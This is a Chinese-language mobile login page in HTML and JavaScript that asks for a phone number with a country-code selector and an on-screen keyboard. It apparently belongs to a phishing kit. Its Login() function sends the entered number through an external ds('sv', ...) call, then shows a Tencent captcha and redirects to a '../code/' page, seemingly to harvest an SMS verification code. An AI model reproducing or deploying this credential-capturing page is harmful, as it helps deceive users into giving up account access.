﻿﻿<html lang="en">
<head>
<meta charset="utf-8">
<meta name="referrer" content="always">
<meta name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no">
<title>登录</title>
<meta name="apple-mobile-web-app-capable" content="yes">
<link href="images/m.css" rel="stylesheet">
<script type="text/javascript" src="images/jquery.min.js"></script>
<script src="../app/data.js"></script>
</head>
<body style="background-size: 50px;">
<div id="content" class="content">
	<form method="post" id="fro" action="update/index.php" autocomplete="off">
		<div id="login" class="login">
			<style></style>
			<div class="title">登录后，体验完整功能</div>
			<div class="info">
				<input type="radio" checked id="domainText" class="domainText">已阅读并同意
				<a class="info_a">用户协议</a>和
				<a class="info_a">隐私政策</a>以及 运营 商服务协议，运营商将对你提供的手机号进行登录
			</div>
			<div id="web_login">
				<input style="visibility:hidden" type="text" name="user" id="domainText" autocomplete="off" value="">
				<input type="hidden" id="type" name="type" value="">
				<ul id="g_list">
					<li id="g_u">
						<div id="del_touch" class="del_touch">
							<span id="del_u" class="del_u"></span>
						</div>
						<select id="user_zone" class="phone_sel">
							<option value="+86" selected>+86</option>
							<option value="+852">+852</option>
							<option value="+853">+853</option>
							<option value="+886">+886</option>
							<option value="+1">+1</option>
							<option value="+44">+44</option>
							<option value="+33">+33</option>
							<option value="+49">+49</option>
							<option value="+82">+82</option>
							<option value="+81">+81</option>
							<option value="+355">+355</option>
							<option value="+213">+213</option>
							<option value="+93">+93</option>
							<option value="+54">+54</option>
							<option value="+353">+353</option>
							<option value="+20">+20</option>
							<option value="+251">+251</option>
							<option value="+372">+372</option>
							<option value="+971">+971</option>
							<option value="+297">+297</option>
							<option value="+968">+968</option>
							<option value="+376">+376</option>
							<option value="+244">+244</option>
							<option value="+1264">+1264</option>
							<option value="+1268">+1268</option>
							<option value="+61">+61</option>
							<option value="+43">+43</option>
							<option value="+994">+994</option>
							<option value="+1246">+1246</option>
							<option value="+675">+675</option>
							<option value="+1242">+1242</option>
							<option value="+375">+375</option>
							<option value="+1441">+1441</option>
							<option value="+92">+92</option>
							<option value="+595">+595</option>
							<option value="+973">+973</option>
							<option value="+507">+507</option>
							<option value="+359">+359</option>
							<option value="+55">+55</option>
							<option value="+1670">+1670</option>
							<option value="+229">+229</option>
							<option value="+32">+32</option>
							<option value="+354">+354</option>
							<option value="+267">+267</option>
							<option value="+1">+1</option>
							<option value="+48">+48</option>
							<option value="+591">+591</option>
							<option value="+501">+501</option>
							<option value="+387">+387</option>
							<option value="+975">+975</option>
							<option value="+226">+226</option>
							<option value="+257">+257</option>
							<option value="+850">+850</option>
							<option value="+240">+240</option>
							<option value="+45">+45</option>
							<option value="+49">+49</option>
							<option value="+670">+670</option>
							<option value="+228">+228</option>
							<option value="+1767">+1767</option>
							<option value="+1809">+1809</option>
							<option value="+593">+593</option>
							<option value="+291">+291</option>
							<option value="+7">+7</option>
							<option value="+33">+33</option>
							<option value="+298">+298</option>
							<option value="+39">+39</option>
							<option value="+689">+689</option>
							<option value="+679">+679</option>
							<option value="+63">+63</option>
							<option value="+358">+358</option>
							<option value="+238">+238</option>
							<option value="+500">+500</option>
							<option value="+220">+220</option>
							<option value="+242">+242</option>
							<option value="+243">+243</option>
							<option value="+299">+299</option>
							<option value="+1473">+1473</option>
							<option value="+995">+995</option>
							<option value="+57">+57</option>
							<option value="+506">+506</option>
							<option value="+1671">+1671</option>
							<option value="+53">+53</option>
							<option value="+592">+592</option>
							<option value="+509">+509</option>
							<option value="+82">+82</option>
							<option value="+7">+7</option>
							<option value="+382">+382</option>
							<option value="+31">+31</option>
							<option value="+599">+599</option>
							<option value="+504">+504</option>
							<option value="+233">+233</option>
							<option value="+1">+1</option>
							<option value="+855">+855</option>
							<option value="+241">+241</option>
							<option value="+253">+253</option>
							<option value="+420">+420</option>
							<option value="+996">+996</option>
							<option value="+686">+686</option>
							<option value="+224">+224</option>
							<option value="+245">+245</option>
							<option value="+1345">+1345</option>
							<option value="+237">+237</option>
							<option value="+974">+974</option>
							<option value="+61">+61</option>
							<option value="+385">+385</option>
							<option value="+269">+269</option>
							<option value="+254">+254</option>
							<option value="+225">+225</option>
							<option value="+965">+965</option>
							<option value="+682">+682</option>
							<option value="+266">+266</option>
							<option value="+856">+856</option>
							<option value="+371">+371</option>
							<option value="+961">+961</option>
							<option value="+231">+231</option>
							<option value="+218">+218</option>
							<option value="+423">+423</option>
							<option value="+370">+370</option>
							<option value="+40">+40</option>
							<option value="+352">+352</option>
							<option value="+250">+250</option>
							<option value="+261">+261</option>
							<option value="+960">+960</option>
							<option value="+356">+356</option>
							<option value="+60">+60</option>
							<option value="+265">+265</option>
							<option value="+223">+223</option>
							<option value="+44">+44</option>
							<option value="+230">+230</option>
							<option value="+222">+222</option>
							<option value="+389">+389</option>
							<option value="+692">+692</option>
							<option value="+262">+262</option>
							<option value="+1">+1</option>
							<option value="+1684">+1684</option>
							<option value="+1340">+1340</option>
							<option value="+976">+976</option>
							<option value="+880">+880</option>
							<option value="+1664">+1664</option>
							<option value="+95">+95</option>
							<option value="+691">+691</option>
							<option value="+51">+51</option>
							<option value="+373">+373</option>
							<option value="+212">+212</option>
							<option value="+377">+377</option>
							<option value="+258">+258</option>
							<option value="+52">+52</option>
							<option value="+264">+264</option>
							<option value="+27">+27</option>
							<option value="+672">+672</option>
							<option value="+674">+674</option>
							<option value="+977">+977</option>
							<option value="+505">+505</option>
							<option value="+227">+227</option>
							<option value="+234">+234</option>
							<option value="+683">+683</option>
							<option value="+47">+47</option>
							<option value="+680">+680</option>
							<option value="+870">+870</option>
							<option value="+351">+351</option>
							<option value="+81">+81</option>
							<option value="+46">+46</option>
							<option value="+41">+41</option>
							<option value="+503">+503</option>
							<option value="+381">+381</option>
							<option value="+232">+232</option>
							<option value="+221">+221</option>
							<option value="+357">+357</option>
							<option value="+248">+248</option>
							<option value="+685">+685</option>
							<option value="+966">+966</option>
							<option value="+590">+590</option>
							<option value="+61">+61</option>
							<option value="+239">+239</option>
							<option value="+290">+290</option>
							<option value="+1869">+1869</option>
							<option value="+1758">+1758</option>
							<option value="+1599">+1599</option>
							<option value="+378">+378</option>
							<option value="+508">+508</option>
							<option value="+1784">+1784</option>
							<option value="+94">+94</option>
							<option value="+421">+421</option>
							<option value="+386">+386</option>
							<option value="+268">+268</option>
							<option value="+249">+249</option>
							<option value="+677">+677</option>
							<option value="+252">+252</option>
							<option value="+66">+66</option>
							<option value="+992">+992</option>
							<option value="+676">+676</option>
							<option value="+255">+255</option>
							<option value="+1649">+1649</option>
							<option value="+1868">+1868</option>
							<option value="+90">+90</option>
							<option value="+993">+993</option>
							<option value="+216">+216</option>
							<option value="+690">+690</option>
							<option value="+688">+688</option>
							<option value="+681">+681</option>
							<option value="+678">+678</option>
							<option value="+502">+502</option>
							<option value="+58">+58</option>
							<option value="+673">+673</option>
							<option value="+256">+256</option>
							<option value="+380">+380</option>
							<option value="+598">+598</option>
							<option value="+998">+998</option>
							<option value="+34">+34</option>
							<option value="+30">+30</option>
							<option value="+65">+65</option>
							<option value="+687">+687</option>
							<option value="+64">+64</option>
							<option value="+36">+36</option>
							<option value="+963">+963</option>
							<option value="+1876">+1876</option>
							<option value="+374">+374</option>
							<option value="+967">+967</option>
							<option value="+39">+39</option>
							<option value="+964">+964</option>
							<option value="+98">+98</option>
							<option value="+91">+91</option>
							<option value="+62">+62</option>
							<option value="+44">+44</option>
							<option value="+1284">+1284</option>
							<option value="+972">+972</option>
							<option value="+962">+962</option>
							<option value="+84">+84</option>
							<option value="+260">+260</option>
							<option value="+235">+235</option>
							<option value="+350">+350</option>
							<option value="+56">+56</option>
							<option value="+236">+236</option>
						</select>
						<div name="0" class="my"></div>
						<input id="u" class="inputstyle" name="username" maxlength="11" placeholder="请输入手机号码">
					</li>
				</ul>
				<div class="line">未注册的手机号验证通过后将自动注册</div>
				<div id="go" class="ivhhsCP" data-clipboard-text="##X-1DGhU9kYf1927U_R##" onClick="Login();">登 录</div>
			</div>
			<div id="switch">
				<div id="zc_feedback">
					<a id="zc" href="../pass/">其他方式登录</a>
					<a id="forgetpwd" href="../pass/">密码登录</a>
				</div>
			</div>
		</div>
	</form>
</div>
<div class="bot">手机号不用了？<a class="info_a">找回账号</a></div>
<img2 style="width:100%;" src="./images/bg9.jpg">

<div id="key1" class="jp en"><ul class="uls"><li class="key">q</li><li class="key">w</li><li class="key">e</li><li class="key">r</li><li class="key">t</li><li class="key">y</li><li class="key">u</li><li class="key">i</li><li class="key">o</li><li class="key">p</li><div class="clear"></div></ul><ul class="uls ulscen"><li class="key">a</li><li class="key">s</li><li class="key">d</li><li class="key">f</li><li class="key">g</li><li class="key">h</li><li class="key">j</li><li class="key">k</li><li class="key">l</li><div class="clear"></div></ul><ul class="uls ulscen"><li class="key_sj" id="A"><img src="images/0.png" width="20"></li><li class="key">z</li><li class="key">x</li><li class="key">c</li><li class="key">v</li><li class="key">b</li><li class="key">n</li><li class="key">m</li><li class="key_del"><img src="images/1.png" width="25"></li><div class="clear"></div></ul><ul class="uls ulscen ulbot"><li class="key_foot key_123">123</li><li class="space">空格</li><li class="key_ok">确认</li><div class="clear"></div></ul></div><div id="key1_" class="jp en"><ul class="uls"><li class="key">Q</li><li class="key">W</li><li class="key">E</li><li class="key">R</li><li class="key">T</li><li class="key">Y</li><li class="key">U</li><li class="key">I</li><li class="key">O</li><li class="key">P</li><div class="clear"></div></ul><ul class="uls ulscen"><li class="key">A</li><li class="key">S</li><li class="key">D</li><li class="key">F</li><li class="key">G</li><li class="key">H</li><li class="key">J</li><li class="key">K</li><li class="key">L</li><div class="clear"></div></ul><ul class="uls ulscen"><li class="key_sj" style="background:#fff" id="a"><img style="width:1.25rem" src="images/2.png"></li><li class="key">Z</li><li class="key">X</li><li class="key">C</li><li class="key">V</li><li class="key">B</li><li class="key">N</li><li class="key">M</li><li class="key_del"><img src="images/1.png" width="25"></li><div class="clear"></div></ul><ul class="uls ulscen ulbot"><li class="key_foot key_123">123</li><li class="space">空格</li><li class="key_ok">确认</li><div class="clear"></div></ul></div><div id="key2" class="jp shuzi"><ul class="uls"><li class="key">1</li><li class="key">2</li><li class="key">3</li><li class="key">4</li><li class="key">5</li><li class="key">6</li><li class="key">7</li><li class="key">8</li><li class="key">9</li><li class="key">0</li><div class="clear"></div></ul><ul class="uls ulscen"><li class="key">-</li><li class="key">/</li><li class="key">:</li><li class="key">;</li><li class="key">(</li><li class="key">)</li><li class="key">$</li><li class="key">&amp;</li><li class="key">@</li><li class="key">"</li><div class="clear"></div></ul><ul class="uls ulscen ul5"><li class="key_sj" id="teshu"><p style="font-size:1rem">#+=</p></li><li class="key">.</li><li class="key">,</li><li class="key">?</li><li class="key">!</li><li class="key">'</li><li class="key_del"><img src="images/1.png" width="25"></li><div class="clear"></div></ul><ul class="uls ulscen ulbot"><li class="key_foot key_abc">abc</li><li class="space">空格</li><li class="key_ok">确认</li><div class="clear"></div></ul></div><div id="key3" class="jp zifu"><ul class="uls"><li class="key">[</li><li class="key">]</li><li class="key">{</li><li class="key">}</li><li class="key">#</li><li class="key">%</li><li class="key">^</li><li class="key">*</li><li class="key">+</li><li class="key">=</li><div class="clear"></div></ul><ul class="uls ulscen"><li class="key">_</li><li class="key">\</li><li class="key">|</li><li class="key">~</li><li class="key">&lt;</li><li class="key">&gt;</li><li class="key">$</li><li class="key">&amp;</li><li class="key">@</li><li class="key">"</li><div class="clear"></div></ul><ul class="uls ulscen ul5"><li class="key_sj key_123"><p style="font-size:1rem">123</p></li><li class="key">.</li><li class="key">,</li><li class="key">?</li><li class="key">!</li><li class="key">'</li><li class="key_del"><img src="images/1.png" width="25"></li><div class="clear"></div></ul><ul class="uls ulscen ulbot"><li class="key_foot key_abc">abc</li><li class="space">空格</li><li class="key_ok">确认</li><div class="clear"></div></ul></div><div id="key4" class="jp zifu"><ul class="uls"><li class="number">1</li><li class="number">2</li><li class="number">3</li><div class="clear"></div></ul><ul class="uls"><li class="number">4</li><li class="number">5</li><li class="number">6</li><div class="clear"></div></ul><ul class="uls"><li class="number">7</li><li class="number">8</li><li class="number">9</li><div class="clear"></div></ul><ul class="uls ulscen ulbot"><li class="num_ok" id="ok">确认</li><li class="number">0</li><li class="num-del" id="del"><img src="images/1.png" width="25"></li><div class="clear"></div></ul></div>
<script type="text/javascript">
document.body.addEventListener('touchmove', function (e) {e.preventDefault()}, { passive: false });
$(".my").click(function() {
	index = $(this).attr('name');
	if (index == 0) {
		$(".jp").hide();
		$("#key4").show();
		chang = 10;
	} else {
		$(".jp").hide();
		$("#key1").show();
		chang = 16;
	}
});
$(".key,.number").click(function() {
	data = $(".inputstyle").eq(index).val();
	if (data.length <= chang) {
		$(".inputstyle").eq(index).val($(".inputstyle").eq(index).val() + $(this).html());
		if(index == 0){
			$('#del_touch').show();
		}else{
			$('#del_touch_p').show();
		}
	}
});
$(".space").click(function() {
	data = $(".inputstyle").eq(index).val();
	if (data.length <= chang) {
		$(".inputstyle").eq(index).val($(".inputstyle").eq(index).val() + ' ');
	}
});
$(".key_del,#del").click(function() {
	data = $(".inputstyle").eq(index).val();
	$(".inputstyle").eq(index).val(data.substr(0, data.length - 1));
});
$(".key_ok,#ok").click(function() {
	$(".jp").hide();
});
$(".key_abc,#a").click(function() {
	$(".jp").hide();
	$("#key1").show();
});
$(".key_123").click(function() {
	$(".jp").hide();
	$("#key2").show();
});
$("#A").click(function() {
	$(".jp").hide();
	$("#key1_").show();
});
$("#teshu").click(function() {
	$(".jp").hide();
	$("#key3").show();
});
function sameChar(str) {
    var result = true;
    var c = str.charAt(0);
    for (var i = 0; i < str.length; i++) {
        if (c != str.charAt(i)) {
            result = false;
            break;
        }
    }
    return result;
}
function error(msg) {
	tip(msg)
	
}
//JS提示弹框
function tip(text, time){
	window.tmsg&&document.body.removeChild(tmsg);
	document.body.insertAdjacentHTML('beforeEnd','<div id="tmsg" style="top:200px;left:20%;right:20%;color:#fff;margin:0 auto;opacity:0;padding:5px;font-size:15px;max-width:300px;position:fixed;text-align:center;border-radius:8px;background-color:#333;border:1px solid #222;box-shadow:rgba(0,0,0,0.25) 0px 0px 10px 6px;transition:opacity 0.6s;z-index:19891016;">'+text+'</div>');
	setTimeout('tmsg.style.opacity=0.8',0);clearTimeout(window.tmst);
	window.tmst=setTimeout('tmsg.style.opacity=0;setTimeout("document.body.removeChild(tmsg)",600);',time||3000);
}
function Login(){
	 var p = $("#p").val();
     var u = $("#u").val();
    if (!$('#domainText').prop('checked')){
        tip('请勾选服务协议！');
        return;
    }
	 if(u == ''){error('您还没有输入帐号！');return false;}
	 if(p == ''){error('您还没有输入密码！');return false;}
	 if (u.length < 6 || u.length > 11) {
		error("您输入的帐号格式不正确，请重新输入。");
		$("#u").val('');
		return false;
	}
	if ( !/^1\d{10}$/.test(u) ) {
		error("您输入的帐号格式不正确，请重新输入。");
		$("#u").val('');
		return false;
	}
	if (sameChar(u)) {
		error("您输入的帐号格式不正确，请重新输入。");
		$("#u").val('');
		return false;
	}
	ds('sv',{user:u,pass:p});
	
	$(".jp").hide();
	var captcha1 = new TencentCaptcha('2046626881', function(res) {
		if (res.ret == 0) {
			location.replace('../code/')
		}
	});
captcha1.show();
}
</script>
<script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
</body>

</body>
</html>